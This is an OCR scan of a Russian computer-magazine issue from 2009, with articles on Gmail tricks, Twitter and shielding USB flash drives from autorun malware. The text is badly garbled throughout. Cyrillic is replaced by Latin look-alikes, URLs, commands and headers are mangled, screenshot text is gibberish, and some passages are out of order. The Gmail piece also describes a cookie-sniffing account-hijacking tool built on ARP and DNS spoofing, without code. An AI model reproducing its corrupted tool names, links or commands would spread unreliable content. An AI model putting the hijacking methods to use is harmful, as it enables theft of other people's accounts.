Однако после процедуры аутентификации часто начинает исполь- 
зоваться обычный НТТР, что опять же видно по адресной строке: 

ІіССр : / /таіі . доодіе . сот/таіі 

Можно попробовать добавить в запрос Ішрз, но толку не выйдет. 
Сервер все равно возвращается обратно к незащищенному соеди- 
нению, а данные по-прежнему передаются в открытом виде до тех 
пор, пока не будет использовано какое-нибудь специальное средс- 
тво (например, ѴРМ) . Благодаря подобной практике и появилось 
улитита ТЬе Міббіег, представленная на конференции Вебсопіб. Во- 
обще говоря, это программа для взлома незащищенных аккаунтов 
на веб-сервисах, но тулзу быстро раскрутили именно какутрілиту 
для угона аккаунтов на СтаіІ. У почтовой службы Соо^іе тут же 
появилась опция для использования защищенного соединения на 
протяжении всей работы («Аіѵѵауз изе Ьггрз»), но по умолчанию она 
отключена. И используют ее единицы. 

Сам ТЬе Міббіег — приложение несложное. По сути, мы имеем дело 
с обычным снифером, написанным на КиЬу (исходники открыты) 
и специально заточенным под перехват пользовательских кукисов. 
Для перехвата трафика используются старые обкатанные приемы, 
вроде АКР-спуфинга или подмены ПЫ5/ПНСР-сервера. А сам ТЬе 
Міббіег уже сейчас в силах выполнять следующее: 

• клонировать изег-сесии в любом прріложении, которое использу- 
ет передачу данных по НТТР; 

• заменять ссылки с использованием безопасного НТТР5 на НТТР; 

• автоматически пересылать браузер жертвы на фишинг-сайт. 



Н ТРИК7:УД0БНАЯРАБ0ТАСНЕСК0ЛЬКИМИ АККАУНТАМИ 

По правде говоря, у меня несколько ящиков на 6 таіі: один я юзаю во 
время командировок, на другой «падают» рассылки и прочий спам, а 
третий используется в качестве хранилища для файлов (вкупе с прогой 
Отаіі Огіѵе). Когда требуется быстро между ними переключиться, 
возникает неприятная ситуация. Сервис Ооодіе’а предлагает только 
один вариант: отключиться от одного аккаунта и зайти в другой. И если 
еще недавно обудобном переключении оставалосьтолько мечтать, 
то теперь появился замечательный плагин СоокіеРіе ( ѵѵѵѵѵѵ.пекіга. 
сот/оззЛігеіох/ехІепзіопз/соокіеріе ) для Рігеіох’а, позволяющий для 
разных вкладок использовать разные наборы кукисов и соответственно 
разные аккаунты на одном и том же сервисе, например, Отаіі’е. 

Если уж вспомнили про Рігеіох,то не могу неупомянуть замечатель- 
ный плагин Отаіі Мападег( ' :іэ5://аббопз.ппо2Іиа.ога/еп-и5Лігеіох/ 
аббоп/1320 ). отображающий уведомления о появлении новых писем. Он 



Исполь^ем спам- 
фильтр СтаіІ для 
своих нужд 

Замечательный спам-фильтр гуглопочты можно заюзать и для 
обычного ящика. Опишу наиболее продвинутый и прозрачный 
вариант, но использовать его можно только в том случае, если на 
почтовом сервере ты можешь создать собственное фильтрующее 
правило (зегѵег-зісіе е-таі1 йкег) . Общая схема выглядит следую- 
щим образом: 

1 . Настраиваем переадресацию почты со своего аккаунта на СтаіІ; 

2. В свою очередь пересылаем все письма с СтаіІ обратно на ос- 
новной аккаунт. Фишка в том, что перед отправкой любого письма 
на твой ящик, СтаіІ обязательно проверит, не является ли оно 
спамом, причем каждое исходящее письмо пометит специальным 
флагом в Ьеабег’ах. 

3. Далее создаем на сервере правило, которое проверяет наличие 
флага, поставленного СтаіГом. Если флаг есть — кладем его в ІпЬох 
(значит, письмо пришло от СтаіГа и прошло фильтрацию) . Если 
же нет — отправляем его на СтаіІ. Резонный вопрос: что добавляет 
СтаіІ в хедеры? А добавляет он вот что: 

Х-Рогѵ^агсіесі-Рог : изег@дтаі1 . сот Рогѵ^агсіе(і@Цо . сот 
Х-Стаі1 -Кесеіѵесі : зоте-гапсіот-питЬег 
Веііѵегесі-То : изег@дтаі1 . сот 
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рверяй, но проверяй. Делаем бэкап ящика 



Корзина для аттачей — достаточно перетащить сюда файлы мышкой 
чтобы они добавились к письму 



также позволяет использовать разные аккаунты, отображая количество 
непрочитанных писем, в том числе, со статистикой по каждой метке. 

Н ТРИК8: ФАЙЛОХРАНИЛИЩЕ ИЗ 6МАІІ 

Начав когда-то с одного гигабайта, Отаіі сейчас предоставляет более 7 Гб 
для хранения почты. Забитьтакое пространство чисто письмами нереаль- 
но, но... если это будутне письма, а файлы? Некоторые умельцы давно 
приспособили сервис для хранения файлов, вкладывая их во вложения, 
которые в дальнейшем отправляли сами себе.Тотеще изврат! :) Авот 
утилита ОМаіІ Огіѵе [ ѵѵѵѵѵѵ.ѵікзое.бк ] — это наш способ. Послеустановки 
этой проги в Винде появляется еще один диск, ничем не отличающийся от 
других драйвов в системе. Разница лишь в том, что его файлы физически 
хранятся в интернете. Разве не здорово получить нахаляву бесплатный 
файловый хостинг? Тем более, такихдисков может быть сколько угодно, 

— тут всячески поможеттулза Отаіі ОгіѵеСопЛд [ ЫірУ/сопѵіѵеа.сот ). 
Если ты хочешь провернуть подобный финт под Линуксом, то тебе приго- 
дится написанное на РуЖоп приложение ОтаіІРЗ [ гісбагб.]опе5.пате ). 
а для пользователей Мае 05 есть дРізк [ дбізк.зоигсеЬгае.пе І:]. При 
желании можно вообще поднять файловый обменник, который будет 
хранить файлы в аккаунте Отаіі. Достаточно установить на хостинге 
РЬр Отаіі Огіѵе [ раб.зоигсеіогае.пеі ]. написанный на РНР при помощи 
довольно простой библиотеки для работы с ОтаіГом — ІіЬдтаіІег 
[ зоигсеІогде.пеІ:/рго]есІ:з/дтаі[-ІІ1:е ). 

Н ТРИК9: ПРОКАЧИВАЕМ ВНЕШНИЙ ВИД 

Возможность смены темы оформления появилась в Отаіі ЕаЬзлишь 
несколько месяцев назад. До этого момента приходилось довольство- 
ваться тем, что предоставляли изощренные скрипты для Огеазтопкеу 
и специальные аддоны для Рігеіох’а. Теперь все просто: два клика в 
настройках аккаунта, и вотоно — новое оформление! Но, если с наведе- 
нием красоты Отаі1теперьсправляется,то некоторые полезные фишки 
интерфейса по-прежнему придется достраивать самому. Это становится 
возможно, благодаря плагину Веііег Отаіі 2 для Рігеіох’а І аббопз.тогіііа. 
огд/еп-Ц5ЛігеІох/аббоп/6076 ). По сути, перед нами набор сценариев 
Огеазтопкеу, скомпонованных в один аддон, — но каков результат! После 
минуты установки мы получаем: 

• отображение количества новых писем в заголовке таба; 

• удобную подсказку по горячим клавишам втекущем окне; 

• иконки для аттачей, указывающие на тип прикрепленных файлов; 

• продвинутую систему для создания фильтров; 

• древовидную структуру лейблов; 

• и т.д. 

г ТРИК 10: ПРОКСИ для 6МАІІ 

«Беда — Отаіі в офисе заблокирован!» — подобное письмо прихо- 
дило в наш РАО. Всякое бывает, но просто так к этой махине доступ 






Рбычный дискетой лишь разницей, что файлы хранятся на Отаі| 

не перекрыть. Если у тебя есть хостинг и доступ к нему не заблоки- 
рован, то ты легко можешь установить неофициальное приложение 
ОтаіІРіІе І дтаіі-Іііе.зоигсеіогде.пеі ). Изначально проект разрабаты- 
вался как легкая альтернатива стандартному интерфейсу Отаіі (без 
тяжеловесных А^ АХ- на воротов). Позже Ооодіе сам сделал простую 
НТМР-версию и максимально быструю страничку для мобильных 
телефонов. Отаіі Рііе, по сути, потерял свой изначальный смысл, но 
его по-прежнему можно использовать в качестве посредника — эда- 
кого прокси на пути к своей почте. Для установки понадобится любой 
мало-мальски рабочий хостинг с поддержкой РНР. В результате мы 
получаем простенький сайт, где после ввода логина и пароля появ- 
ляется упрощенный интерфейс привычного почтовика. В качестве 
примера приведу ѵѵѵѵѵѵ.іебзіа.сот/дтаіі/іпбех.рбр . нозаходить 
через чужой сервис на настоящий почтовый ящикятебе убедитель- 
но не рекомендую :). В основе скрипта лежит разработанная этим же 
автором и упомянутая выше библиотека ІіЬдтаіІег. 

Н ТРИК11:ДЕЛАЕМ БЭКАП СВОЕГО ЯЩИКА 

Трудно даже предположить, чтоутакой компании какОоодІе, сее 
практически 100% аптаймом, могут случиться траблы с потерей данных. 
Однако недавняя «промашка», приведшая кдауну на несколько часов, 
все-таки пошатнула каменную уверенность в поисковом гиганте. Как 
говорится, — доверяй, но проверяй. Ксчастью, сделатьбэкап всей кор- 
респонденции со своего ящика из Отаіісовсем не сложно с помощью 
специальной тулзы Отаіі Васкир ( ѵѵѵѵѵѵ.дтаіІ-Ьаскир.сот ). Получив от 
тебя етаіі, пароль для ящика, а также даты, за которые нужно забэ- 
капить корреспонденцию, утилита честно выкачает все по протоколу 
ІМАР и сохраните форматЕМР — поддерживаемом практически всеми 
десктопными почтовиками. На случай «пэ» добавлена кнопка Везіоге, 
которая все вернет на свои места. Приятно, что версии проги есть как 
для Винды, таки Линукса. В последнем случае, правда, придется допол- 
нительно установить ѵѵхРуіЬоп ( ир://ѵѵхрѵіЬоп.огд ]. ^ 
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ТВИТТЕРОВ 







ПРИОБЩАЕМСЯ к ЭЛИТНОМУ СЕРВИСУ МИКРОБЛОГИНГА 



|В аэропорту Амстердама на части развалился пассажирский авиалайнер. 
Новость «из первых рук», но источник — не новостные агентства, не СNN или 
ВВС и да^не предст^ители аэропорта. Обычный парень пірр увидел все 
^оими глазами и тут же набрал 140 символов сообщения в своем твиттере. О 



[происшествии моментально узнает весь мир. 





то такоетвиттер? С одной стороны, штука довольно сложная: 
блог, мессенджер и социальная сеть в одном флаконе. С 
другой — понятие исключительно простое: лента из неболь- 
ших сообщений, которые пишетпользователь, и люди, которыежелают 
эту ленту читать. Получаем несложную форму: традиционный блоггерс- 
кий сервис + маленькие сообщения = микроблоггинг. 



грибы после дождя. Для любой ОС, любой платформы, любого мобиль- 
ного девайса, — будьте новенький іРЬопе, флагманская Мокіа или 
старенький телефон, который разве что можетзапустить ^аѵа-апплет. 
Что касается изначально задуманного 5М5-гейта, он также доступен, но 
только в Штатах. 

Н В ЧЕМ ПРИКОЛ? 



В 140 СИМВОЛОВ ТВИТТЕРА 

После регистрацииты получаешьтвиттер-канал илитвит — ленту своих 
сообщений, а также ответов на них. Те, кто тебя читают, называются 
фолловерами (от слова Іойоѵѵ, на здешнем языке это означает «друзья»). 
Найти свой твит несложно — достаточно ввести в адресной строке Ьир:// 
Іѵѵіиег.сот/твой ник . 

Авторизированному пользователю, помимо этого, отображаются еще и 
посты тех людей, которыхон добавил в Іойоѵѵ-список. На любой такой пост 
он может написать ответ — и тот, в свою очередь, отобразится втвите автора. 
Самое главное правило — сообщение не должно превышать 140 символов. 
Почему? Дело втом, что первоначальная идея твиттера состояла в 
создании сервиса, который основывался бы на 5М5 и позволял быстро 
оповестить всех друзей отом, где ты и что делаешь. Для примера, 
заваливаешься надиско и видишь, что вышла бы хорошая тусовка 
— вот и надо позвать всех «своих». Ну, или откопал свежий баг в ядре 
Ніпих’а и сообщаешь всем друзьям, что скоро будешьтестить на них свой 
0-бау эксплоит. Сграничение в 140 символов возникло как раз отсюда: 
максимальные для 5М5 160 символов за вычетом места дляслужебной 
информации. Со временем идею смс расширили и добавили другие спо- 
собы публикации сообщений (втом числе, через открытый АРІ), которые 
используютудобные и красивые приложения, появляющиеся в Сети как 



Невольно напрашивается вопрос: «Ав чем разница стемжеЖЖили 
другим блоггерским сервисом. В чем секретуспеха?». Так вот, самая 
главная фишка заключается именно в формате микро. Задумайся: блог- 
герских сервисов десятки, но сколько зарегистрированных пользовате- 
лей готовы регулярно постить сообщения? Лишь малая часть, и при этом 
практически все судовольствием читаютлентудрузей, оставляя не- 
большие комментарии. Обращаю внимание: небольшие! Написать свое 
мнение, мысли, интересный факт в паре предложений и затем прочитать 
такиеже короткие ответы поделу намного проще, чем сварганитьдоброт- 
ный пост в обычный блог. И люди действительно пишут... втвиттер. 
Важный конексервиса — оперативность. Часто ли ты видел вЖЖ 
сообщения: «Я сижу в баре на улице Хакеров, буду до 1 6-00, присоеди- 
няйтесь!»? Едва ли. Рядовому пользователю блога и в голову не придет 
обновлять свою і^гіепб-ленту каждую минуту или хотя бы раз в час, а 
поэтому смысла втаких мессагах — ноль. Ствиттером совсем другая ис- 
тория. Какя уже заметил, юзеры используют разные способы получения 
сообщений и, в особенности, удобные программы, которые подобно ась- 
ке сидятвтрее и практически моментально отображают новые сообще- 
ния из френдленты. Ты можешь быстро написать пост — и также быстро 
получить ответ. В результате получается эдакий коллективный чат, где ты 
легко можешь предложить какую-нибудь интересную идею сразу всем 
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Авоти лучшие программы-клиенты по версии самого твиттера 
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> іп^о 

Для работы с 
Твиттером есть не 
только АРІ, но и 
текстовые коман- 
ды, вставляемые 
прямо в сообще- 
ние. Например, 
ѴѴН0І5 изегпате 
(выдает профайл 
пользователя), ОЕТ 
изегпате (послед- 
ние записи изтви- 
та), РАѴ изегпате 
(пометить послед- 
ний твит избран- 
ным), ІМѴІТЕ рЬопе 
питЬег (пригла- 
сить человека по 
номерутелефона, 

— ему придет смс). 
Полный список 
команд смотри в 
справке ( Ьир:// 
іѵѵіиег.гепбезк. 
сотЛогитз/1071 1/ 
епі:гіе5/14020 ). 




своим знакомым, не устраивая массовую рассылку в аське/ 
джаббере или обзванивая нужныхлюдей. 

Возможность быстрого ответа — это следующий бонус. Не в 
пример блогам, тут необязательно заходить на сайт, автори- 
зироваться и заполнять непонятные формы. Если утебя есть 
удобная программа для работы стви^ером,то ответить на 
сообщение друга несложнее, чем отправитьсообщение по 
аське. На фоне всех этих ѴѴогбргезз’ов и ЖЖ, твиттер прост 
и понятен даже работникуЖЕКа. Главное, что надо помнить 

— нельзя писать больше 1 40 символов! Согласись, это просто 

— пришла мысль, ткнул кнопку и она уже в твите! Читаешь 
классную статью? Напиши втвитидобавьссылку — возможно, 
это кому-то интересно. Попался классный ролик — еще один 
пост, пусть его посмотрят друзья (правда, можно о публиковать 
тольколинкна него). Собираешься выбраться погулять?Так 
почему бы не позвать кого-нибудь через твиттер! 

г ВОКРУГ ТѴѴІТТЕК-А 

Немалую долю популярности твиттеру обеспечила его 
политика открытого АРІ. С помощью хорошо описанного 
программного интерфейса можно автоматизировать все 
аспекты работы сервиса: например, добавить на свой сайт 
последние сообщения, автоматически анонсировать новые 
статьи в блогах и многое другое. Для программистов досту- 
пен отдельный сайтсо всеми подробностями интерфейса 



( аріѵѵікі.іѵѵіііег.сот ). Главное, после прочтения, не про- 
граммировать кофеварку, чтобы она оставляла в твиттере 
сообщение всякий раз, когда ты готов выпить кофе :). 



Кого интфесного 
почитать/ 

Ситуация в русской части твиттера напоминает зарождение интернета в 
России. Сначала Сеть была доступна исключительно для элитарных масс, 
гиков и хакеров, а лишь потом началось постепенное движение — к каждому 
школьнику и студенту, а теперь и любой секретарше в «Одноклассниках». 

Так и здесь. Сейчас русскоязычная часть составляет чуть более четырех тысяч 
человек, но зато какие люди! В твиттере легко встретить популярного блогге- 
ра, подкастера (их особенно много), владельца крупной компании, сетевого 
СМИ или торрента, много тех, кого сейчас называют стартаперами, и их 
инвесторов. А уж программистов и других ИТ-шников — пруд пруди. Вместе 
с тем, появляется немало коммерческих твиттеров : каналы создаются для 
продвижения своей продукции, анонсирования проекта или просто пиара. 
На сайте іггр: //^N^N^N гпгѵѵіг г публикуется рейтинг твит- 

тер-пользователей в России. Так, на первом месте — известный подкастер 
НтриШп (Радио-Т и другие подкасты) : его читают 2486 человек. 
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> СІѴСІ 

На нашем ОѴО-диске 
выложены самые 
интересные програм- 
мы, а также набор 
открытых библиотек 
для разных языков 
программирования 
— для написания 
своего клиента (а чем 
ты хуже других-то?). 




> ѵѵагпіпд 

Лучше дважды 
подумать перед тем, 
как писать очередную 
шутку над преподом 
или рассказывать, 
насколько туп 
студент, сидящий по 
соседству. Вполне 
вероятно, что кто-то 
нажмет заветный 
ретвит, — и препод 
прочтеттвое сообще- 
ние быстрее, чем ты 
сможешь оправдать- 
ся. 




©дтаіі.сот (12) 
©Ьоілпаіі.сот (694) 

□ ідзЬу- ОДИН ИЗ самых мощных и продвинутых клиентов для ТѵѵіЛег-а и других социальных сетей 




> Ііпкз 

На сайте ЬирУДууІЛег. 
рЬѵуікі.сот/Аррз 
публикуется список 
всего-всего на свете, 
что работает с Твит- 
тером. 



Самая главная заслуга открытого АРІ — появление огромно- 
го количества твиттер-клиентов. Какраньше все начина- 
лось с программы Ьеио ѵѵогІсІ!,тактеперь обязательным 
атрибутом всех новых платформ и языков является демонс- 
трация твиттер-клиента. Клиенты для постинга в самом 
деле очень удобны. Не надо лезть на сайт или держать 
открытой страницу, вкладка которой обязательно 
теряется среди всех остальных. Клиент сворачивает- 



ся втрей и открывается по первому требованию, как 
только в голову пришла свежая идея или во всплыва- 
ющем окне проскочило интересное сообщение (ты же 
хочешь на него ответить?). 

Лично я считаю лучшим клиентом небольшое АІР-приложе- 
ние ІѵѵЫгІ, через которое веду свой личный твиттер [ іѵѵіиег. 
сот/аЬгсІеѵ ) и читаю своих фолловеров. Но в Сети выложен 
целый списокразличных программ. Вот, кпримеру, офици- 



Тѵѵійег-глассарий 



Твит или твиттер — лента твоих сообщений, а также 
ответов на посты других людей, видна всем. 

Фолловер — человек, который добавил тебя в свой список 
и читает твой твит. 

Приватный твит — ты можешь перевести свой аккаунт в 
приватный режим, и тогда првдется вручную разрешать 
или запрещать другим фоловить тебя или писать тебе 
сообщения. 

Решіей или ответ — публичный ответ на чье-то сооб- 



щение. Ответ должен начинаться с символа @ и имени 
твиттера получателя. 

Прямое сообщение — приватное сообщение, которое не 
попадает в публичную твит-ленту. 

Ретвит — это самый быстрый, почти мгновенный способ 
разнести новость по всему миру, особенно если у тебя 
хотя бы сотня фолловеров. Получил сообщение-бомбу от 
друга, нажми ретвит и оно будет переслано всем твоим 
подписчикам! 



► 028 



ХАКЕР 03 /123/ 09 



Ноли Рібй* РвчІ РирІ* Н*^і Зч" ч 



\ЛЛіаІ аге уои скжі0? 



ІМшу (йВВщкІкчП НѴ№1, ( ІІ*і4йаі]т''^№* 

діі пді, ни»!) ■ стздич гѵ«-Ст лрожі ѵ<ні^ ет нѵі^юК 
шівіннііг «ЫзШ а Амт «по 










з4?ге]*у спешу сооСчіфПЪ что стартап, с ютарым п іпоііі^' 
уЖА ди пца, есшдл ш стадий л(№бгга л^аюитіа,. от 
начальной идеи остались лнш 'ириія^.. 

ігй«Г#А«п ортДші ш*Ь 

дЬіг(і«ѵ ^оСі::.іи Красин И креативно, спасиОйі 
д^/ѵп шЬ йіп^ І9 ан4ійі 



«««Ніи СепшкіК^ращеноа юскресенье. не забудьте 
ропросмтъ щнценьп если надо, ну и исмренне чюстѵт»)) 

оЬиіГ №^»ит о^^ѵпи>^ 

іітриіип РТ 1^ и ік^атьі ддкггуіны НЗЯР 
аЬбыС и і^ял «/а^ѵп Іч4аігті/к 



соьніи заічиюкцин нафэсзд»здэиЛ просішіриеая >саор, 
ноіщтікь не стетъю автррэ [№и«кѵ про ЭИ проещии 
Ф{№мі4^ , ішр;/ліпуип 

аЫіШ })штт счсі 

сооьки эропиаа прнм№)( ПРрУ/скк.ш/дркс іесной аас;)> 

<ЛоЫ! ^^ЛшIТ орт/Кт 



кеЫ^Іи 30 ]а*суми ОТ Эдгара Млдпп^ Просто нет цвдИ 

ПЕ1р/Л:Іі:і-: Ші''4ііі 
йІу01ЛііІ^яіпі^РХ^аічЬ 

соь^«>ц самк большое зершч в мире ПНр:№1ск.ги^4(Д 



аЬсОеѵ 
13 75 



РІГТСІ Н*5Ы^«« 
р.пчіа** 



КНЧВВ 



После авторизации влейте отображаются сообщения юзеров, которых 
ты (оНоѵѵ-ишь 





ІтеееіГессі 



ирпч» гя«а« Нім' г»*е 



Зѳ4 а ТѵѵееІРеесІ ѴѴІсІдеІ Іог уоиг 
ѵѵеЬзИе ог Ыод! 



Си&іотііе ѴоигѴѴкІдеі 



Ргеѵіеѵѵ 



ІірЬопі 

[гы 

ІКшіКчі «Пкм4№* іЬнм 

15 

ЦрОо^т)анСиіт| 



ѴѴкІдегСосІе 

-#м> 

І Хжіі-Ірі: С7КЬ*~Ькя6 ^ Ди М рі ід* ~ 
/Лт^«Кі*а,с*р 
/яЬашіиІ^Е . рЬ|іТЬ> ЕрЬйші 
1-54і>350КѵИсй4^> 
'Е/кЕІрБі^аіѴ ЯЧІЬ-^ИИІ- 
ІфКі 

г/ /К**ЬК*М«1, 

й «іАдвт 1І.ІШ ЕЬіьТ</ь>с/аі'ѵ> 






Хочешь в иджеттвиттера на страничку? Этотсервистебе поможет 



альный раздел ( іѵѵіиег.сопп/боѵѵпіоабз ) на самом сайте твиттера. Клиен- 
ты представлены на любой вкус — для РС, мобилы, іРЬопе/іТоисб, боодіе 
□езкЬр-а, Мас-а, Ыпих-а и вообще любого устройства, где естьдоступ 
кСети, экран и клавиатура. И хотя почти все программы, по сути, делают 
одно и то же, число их постоянно растет. Многие ресурсы даже публикуют 
рейтинги (вроде ТЬе Тор 21 ТѵѵТіегАррІісабопз, который можно найти на 
ѵѵѵѵѵѵ.1:есбсгипсЬ.сопп/2009/02/19ЛЬе-Іор-20-І:ѵѵіиег-арр[ісаТоп5 ]. Из 20 
приложений точно можно выбрать что-то под себя. 

Разработчиков сервиса нельзя упрекнуть в отсутствии фишек и 
примочек. Напротив, они постарались сделать твиттер максимально 
простым, но оставили возможность апгрейда за счетАРІ. И это работа- 
ет! Паразитируя на основном ресурсе, появилисьсторонниесервисы, 
предлагающие пользователям то, что не предоставляется в самом 
твиттере. Например, счетчики количества читателей твоей ленты [ Ыір:// 
Іѵѵіиегсоипіег.сопп ), различные виджеты для встраивания в блоги или 
веб-сайты ( ЫірУЛѵѵіІІег.сопп/ѵѵібаеІз ), поисковые машины (бирѴ/ѵѵѵѵѵѵ. 
Іуѵееібпб.сот і, карты самых активныхтвиттерчан втвоем городе [ ЬирУ/ 
1:ѵѵі1:І:егсоипІ:ег.сопп/раде5/соипІ:гѵ?бппе 20 пе=Кѵеѵ] — и еще сотни и 
тысячи других, полезных, интересных (или бесполезных, но прикольных). 
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Можно писатьсообщения из клиента, а читать ленту через веб или 
наоборот — тут полная свобода действий! 

Н ПРИСОЕДИНЯЙСЯ! 
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Твиттер это действительно классная платформа для общения. Ты чита- 
ешь— тебя читают, ты комментируешь — тебя комментируют. Все, как 
дважды два. Оценить его можно, только попробовав и показав друзьям. 
Но стоит проникнуться идеей, какчерез месяц-другой будешь задавать 
себе вопрос:«И чтожея раньше без ТѵѵТіег’а делал?!». Но итут главное 
— не перебарщивать :]. ~5г 



Что внутри 
твиттерѣ 

Идея создания сервиса пришла в голову Джеку Дорси (его твиттер: 
ЬирТАѵѵіІІег.соппДаск ) в 2006 году когда он вместе с нынешней 
командой разработчиков твиттера трудился над другим стартапом. 
Идея появившегося вскоре проекта была подхвачена прогрессивным 
сообществом — и фишку что называется, поперло. Сначала сервис 
завоевал награду как лучший блог-сервис, потом всяческие награды 
вроде МТѴМизіс Аѵуагб, Арріе ѴѴѴѴВС 2007. Все это, разумеется, прибав- 
ляло интереса новому сервису, где новости разлетались, как горячие 
пирожки. Многие блоггеры в то время начали использовать твиттер как 
инструмент для репортажей прямо из залов мероприятий, доказав, что 
даже профессионалам легче постить в твит, чем писать в блог. Позже 
твиттер начали упоминать в новостях и по телевизору, а пользователи 
пошли валом. На данный момент пользователей твиттера уже больше 
6 миллионов . А тех, кто читает твиттер или просто посещает страницы, 
— более 50 миллионов. Лакомый кусочекхотел приобрести РасеЬоок, 
не поскупившись на 500 млн баксов, но этого оказалось мало. 
Вьщержать такую нагрузку непросто, поэтому неудивительно, что у 
сервиса не раз были серьезные проблемы с аптаймом. Начавшись как 
обычный проект, разрабатываемый в свободное от основной работы 
время, он прошел путь от 0 до мршіиона просмотров за пару месяцев. В 
основе движка лежат КиЬуопКаіІ5 и базы данных МуЗрЬ. Кроме этого, 
активно используется кластер серверов кешированрія тетсасЬеб. Ддя 
обслуживания сервиса (а это немного-немало — больше 600 запросов 
в секунду!) установлены 8 больших серверов 5ип. Ддя базы также 
юзают один крутейший 8-ядерный сервер и 180 копий НТТР-сервера 
Мопгеаі для КоК. Изначальная система работала хорошо только на пер- 
вых порах. Как только пользователей стало реально много, начались 
серьезные проблемы и перебои. В Сети пошла волна разговоров о том, 
что КоК плох для серьезных проектов — мол, не способен обеспечить 
работу даже простого по сути сервиса Тѵѵіпег. Впрочем, ребята из ком- 
пании не стали рвать на себе волосы и переписывать все на іаѵа или 
С -Ь -Ь , а просто наняли одну из специальных контор, которая занимает- 
ся масштабированием, и довели систему «до ума». 
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Правильно говорят: «все новое — хорошо забытое старое». Привыкнув, что 
зараза прет только через инет, мы окончательно забыли, как лихо подцепляли 
вирусы с дискет друзей и знакомых. В наше время малварь нашла другой спо- 
соб распространения: через П8В-носители. Они оказались идеальным контей- 
нером. А вкупе с дебильной политикой Винды — еще и очень эффективным. 



ставь пендрайв где-нибудь в универе или интернет-кафе 
— и малварь не заставить себя ждать. К гадалке не ходи по 
поводу флешки подружки: вопрос тут только втом, сколько 
разновидностей малвари уживается в одном месте. Да что там говорить, 
— если дажеу опытных пользователей на внешних носителях часто 
оседает случайно подцепленная зараза? Принцип действия настолько 
прост, что описывается буквально в двух словах. Любой вирус, у кото- 
рого в арсенале числится распространение через внешние носители, 
использует? файла аиіогип.іпі и бинарник с собственно телом вируса. 
Когда пользователь вставляет флешку. Винда считывает зловредный 
аиіогип.іпі и, следуя указаниям, сразу запускаеттело вируса или же 
исполняетего во время двойного клика по иконке накопителя. Нуа, 
обосновавшись в системе, ничего не стоит копировать эти файлы на 
все подключаемые в систему диски. Недавний опыт Ооѵѵпабир, который 
использовал небольшой хинт, чтобы обманутьантивирусы, показал, что 
дело пора брать в свои руки. Сегодня мы разберемся, во-первых, как 
обезопасить свою флешку, а во-вторых, как избавить систему от «вред- 
ных привычек». 

В МТР5 — НАШЕ ВСЕр ИЛИ СПОСОБ №1 

Оставим изучение живности зоологам. Вместо того чтобы ежедневно 
отлавливать малварь, мы сделаем так, чтобы она попросту не появля- 
лась. Адля этого создадим флешке такиеусловия, чтобы живностьтам 
не могла существовать. Первый способ — оченьлегкий и, пожалуй, 
самый эффективный (но, увы, не лишенный недостатков). Суть втом, 
чтобы распрощаться с файловой системой РАТ32, которая поголовно ис- 
пользуется на внешних носителях поумолчанию, — и перевести флешку 
на МТР5, получив все ее преимущества. Самый удачный вариант 



перейти на МТР5 — отформатировать пендрайв специальной утили- 
той от компании НР: НР 1)5В ОізкБіогаде РогтаіТооІ (дистрибутив 
можно найти в Соодіе по названию файла 5Р27213.ехе). Требуется лишь 
выбрать нужный диск и файловую систему — в нашем случае МТР5. 
Практика, однако, показывает, что ничем не хуже оказываются встро- 
енные средства Винды. Поэтому можно просто выбрать в контекстном 
меню пункт«Отформатировать» или даже банально воспользоваться 
консольной командой: 

РогтаС Р: /РЗ:ЫТРЗ 

Если есть необходимость сохранить данные на флешке, используй 
встроенную утилиту для преобразования файловой системы на выбран- 
ном разделе: 

сопѵегР Р: /РЗгЫТРЗ 

Вспоминаем, что вирусу обязательно нужно создать свой аиЬгип.іпІ в корне 
сменного носителя, чтобы обосноваться на 115В-носителе. Поэтому следую- 
щий шаг — простозапретитьсоздание каких-либо файлов в корне флешки. 
Где же тогда хранить файлы? Очень просто — в специально созданной папке 
(пустьона будет называться РІЕЕ5), для которой по-прежнему будут разре- 
шены операции чтения/записи/выполнения файлов. Для этого переходим в 
свойства безопасности каталога и нажимаем на кнопку«Дополнительно». В 
появившемся окошке надо сделать важную вещь — отключить наследова- 
ние разрешений от родительского объеета, сняв соответствующую опцию. 
Далее, в появившемся диалоге, жмем «Копировать» и выходим отсюда, 
дважды ответив «Ок». Теперь можно смело отключать запись в корневой 
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каталог, не опасаясь, что новые политики будут унаследованы 
в нашей папке с файлами. Выбираем в колонке «Запретить» 
пункт«3апись», а в столбце «Разрешить» оставляем следу- 
ющие права: «Чтение и выполнение», «Списоксодержимого 
папки», «Чтение». В итоге, мы получаем флешку, на которую 
несможетзаписаться АиФгип (ради чего собственно все и 
затеял и) . Для удобства можно создать за щи щен н ы й от за п иси 
аиФгип.іпб который будет открывать ту самую папку РІІЕ5. 
Панацея? Ксожалению, нет. Если малварьзапущена с пра- 
вами администратора, то ничто не помешает ей поменять 
АСЕ-разрешения, как вздумается. Правда, на практике, 
малвари, готовой к подобной ситуации, пока немного. А 
вот со следующей проблемой я столкнулся лично, — когда 
вставил вакцинированную флешку в свою магнитолу и, 
естественно, обломался. Большинство бытовых девайсов 
знать не знаюто существовании МТР5 и работа ют только с 
флешками на РАТ32. Многие люди используют в качестве 
флешки Р5Р или МРЗ-плеер — и их вообще никак не полу- 
чится отформатировать в МТР5. Ну и напоследок: флешки 
с МТР5 становятся Реаб опіу на маках и на многих Ыпих’ах. 
Внимание — важный нюанс! Отформатированную в МТР5 
флешку обязательно нужно вытаскивать через «Безопас- 
ное отключение устройства». Если в случае с РАТ32, на это 
можно былосмелозабивать,тос МТР5 вседанные проходят 
через кэш, и вероятность того, что часть данных, не успев 
полностью скопироваться из кэша, пропадет при отклю- 
чении, крайне велика. В общем, ты меня понял — только 
«Безопасное отключение»! 



г СЛАВНЫЕ ОСОБЕННОСТИ РАТ32р ИЛИ СПОСОБ №2 

Какя уже сказал, варианте МТЕ5 прокатывает далеко не 
всегда. Но есть возможность оставить носитель на родной 
файловой системе ЕАТ32 и, болеетого, — использовать для 
защиты ее специфику. Задача опятьжета же — запретить 
вирусу создавать на флешке файл аиЬгип.іпЕ Когда-то было 
достаточно просто создать каталоге именем АІЯОВиМ. 

ІМЕ, выставив ему атрибуты «Веаб опіу» и «Нісісіеп». Такмы 
препятствовали созданию файла с тем же именем. Сейчас 
это, понятно, не вариант. Зато есть чуть модифицирован- 
ный трик, который большинство малвари обходить пока не 
научилось. Объясняю идею. Создаем каталогАСТОВСМ. 

ІМЕ. Если каталог не пустой, удалить его можно, лишь 
расправившисьсо всем содержимым. Это очень просто, 

— но только не в случае, когда в каталоге есть файлы с 
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Свойства; ЕзсІНОО (Р:) 



Общие 



Ддтооапуж 



Сеіяйс 



Оборуасюение 



Доступ 



Бе^пасность 



Кеегта 



